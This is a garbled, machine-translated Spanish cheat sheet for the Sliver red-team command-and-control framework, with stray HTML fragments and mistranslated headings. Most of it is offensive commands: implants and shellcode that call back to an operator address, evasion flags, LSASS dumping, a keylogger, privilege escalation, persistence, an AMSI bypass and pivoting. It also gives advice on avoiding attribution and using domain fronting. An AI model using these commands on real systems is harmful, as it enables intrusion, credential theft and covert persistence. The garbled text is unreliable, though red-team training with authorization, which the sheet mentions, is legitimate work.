Sliver C2 Marco Cheat Sheet
"Clase de la hoja" idbutton id="sliver-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos
########################################################################################################################################################################################################################################################## Generar PDF seleccionado/button
■/div titulada
Sinopsis
Sliver es un moderno y de código abierto de la emulación de adversarios / marco de equipo rojo diseñado como una alternativa a Cobalt Strike. Proporciona capacidades avanzadas de mando y control con soporte para múltiples plataformas, comunicaciones evasivas y operaciones basadas en equipo.
NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación
Binarios precompilados (recomendados)
# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server
# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server
# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releases
Build from Source
# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make
Docker Instalación
# Pull official Docker image
docker pull bishopfox/sliver
# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver
Uso básico
Inicio Sliver Server
# Start the server (first run will generate certificates)
./sliver-server
# Start server with custom configuration
./sliver-server -c /path/to/config.json
# Start server in daemon mode
./sliver-server daemon
Conexión cliente
# Connect to local server
./sliver-client
# Connect to remote server
./sliver-client -c /path/to/client.cfg
# Generate new client configuration
./sliver-server operator --name username --lhost server-ip
Referencia del Comando
Gestión de servidores
| Command | Description |
|---|---|
help |
Display help information |
version |
Show version information |
operators |
List connected operators |
kick-operator <name> |
Disconnect an operator |
armory |
Access the Sliver armory (extensions) |
Gestión de escuchas
| Command | Description |
|---|---|
mtls |
Start mTLS listener |
wg |
Start WireGuard listener |
http |
Start HTTP listener |
https |
Start HTTPS listener |
dns |
Start DNS listener |
jobs |
List active listeners |
jobs -k <id> |
Kill a listener |
Generación de implantes
| Command | Description |
|---|---|
generate |
Generate implant |
generate --mtls <host:port> |
Generate mTLS implant |
generate --http <url> |
Generate HTTP implant |
generate --dns <domain> |
Generate DNS implant |
profiles |
List implant profiles |
profiles new <name> |
Create new profile |
Gestión del período de sesiones
| Command | Description |
|---|---|
sessions |
List active sessions |
use <session-id> |
Interact with session |
background |
Background current session |
sessions -k <id> |
Kill a session |
sessions -K |
Kill all sessions |
Configuración del oyente
mTLS Listener (Recomendado)
# Start mTLS listener on default port (8888)
mtls
# Start mTLS listener on custom port
mtls -l 443
# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888
HTTP/HTTPS Oyentes
# Start HTTP listener
http -l 80
# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem
# Start HTTP listener with custom domain
http -l 80 -d example.com
DNS Listener
# Start DNS listener
dns -d example.com
# Start DNS listener with custom nameserver
dns -d example.com -l 53
WireGuard Listener
# Start WireGuard listener
wg -l 53
# Start WireGuard listener with custom key port
wg -l 53 -x 1234
Generación de implantes
Generación básica de implantes
# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe
# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf
# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho
Opciones avanzadas de implantes
# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant
# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols
# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode
# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared
Cargas de pago fijas
# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged
# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe
Interacción del período de sesiones
Comandos de sesión básica
# Get system information
info
# Get current user
whoami
# Get current working directory
pwd
# List files and directories
ls
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
Gestión de procesos
# List processes
ps
# Get current process info
getpid
# Migrate to another process
migrate <pid>
# Execute command
execute <command>
# Start interactive shell
shell
# Terminate process
terminate <pid>
Operaciones de red
# Get network interfaces
ifconfig
# Get network connections
netstat
# Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80
# List port forwards
portfwd
# Remove port forward
portfwd rm --id <id>
# SOCKS proxy
socks5 start
# Stop SOCKS proxy
socks5 stop
Escalada de Privilege
# Get current privileges
getprivs
# Attempt privilege escalation
getsystem
# Run as different user
runas -u username -p password <command>
# Impersonate token
impersonate <token-id>
# Revert to self
rev2self
Persistencia
# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe
# Install registry persistence
persistence registry --hive HKCU --path "Software\\Microsoft\\Windows\\CurrentVersion\\Run" --key "MyApp"
# Remove persistence
persistence remove --id <persistence-id>
Características avanzadas
Movimiento Pivot y Lateral
# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999
# Connect through pivot
generate --mtls pivot-host:9999 --os windows
# List active pivots
pivots
# Stop pivot
pivots --id <id> stop
Cosecha temporal
# Dump process memory
procdump -p <pid> -s /tmp/dump.dmp
# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp
# Screenshot
screenshot
# Keylogger
keylogger start
keylogger dump
keylogger stop
Técnicas de evacuación
# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe
# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe
# PowerShell execution
powershell -c "Get-Process"
# Bypass AMSI
armory install bypass-amsi
Perfiles y Plantillas
Crear perfiles
# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64
# Generate from profile
generate --profile windows-profile
# List profiles
profiles
# Delete profile
profiles rm windows-profile
Personalización del perfil C2
# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website
# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443
Extensiones de armas
Instalación de extensiones
# Update armory
armory update
# Install extension
armory install <extension-name>
# List available extensions
armory
# List installed extensions
armory installed
Prórrogas populares
# Process injection techniques
armory install process-injection
# Credential dumping
armory install credman
# Registry operations
armory install registry
# WMI operations
armory install wmi
Operaciones de equipo
Multi-Operador Configuración
# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg
# Connect as operator
./sliver-client -c operator1.cfg
# List connected operators
operators
# Send message to operators
msg "Hello team!"
Período de sesiones compartido
# Share session with team
sessions -i <session-id> --shared
# Take control of shared session
use <session-id>
Solución de problemas
Cuestiones comunes
Problemas de conexión
# Check listener status
jobs
# Restart listener
jobs -k <listener-id>
mtls -l 8888
# Check firewall rules
# Ensure ports are open on server
Detección de implantes
# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug
# Try different communication protocols
generate --dns example.com --os windows
# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows
Cuestiones de ejecución
# Adjust beacon interval
use <session-id>
reconfig --beacon-interval 60s
# Use compression
reconfig --compress
Debugging
# Enable debug mode
./sliver-server --debug
# Check logs
tail -f ~/.sliver/logs/sliver.log
# Verbose client output
./sliver-client --debug
Consideraciones de seguridad
Seguridad operacional
- Usar comunicaciones cifradas (mTLS recomendado)
- Rotar regularmente certificados y llaves
- Implementar controles adecuados de acceso para los operadores
- Supervisar y registrar todas las actividades
- Utilizar servidores de estadificación para evitar la atribución directa
Mejores prácticas de evasión
- Intervalos de faro y jitter
- Use dominios y certificados de aspecto legítimo
- Implementar el frente de dominio cuando sea posible
- Utilice múltiples canales de comunicación
- Actualizar regularmente implantes y técnicas
Recursos
- Documentación oficial de la vida
- Sliver GitHub Repository
- Bishop Fox Blog
- Sliver Community Wiki
- Red Team Village Sliver Training
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Sliver C2 Framework. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *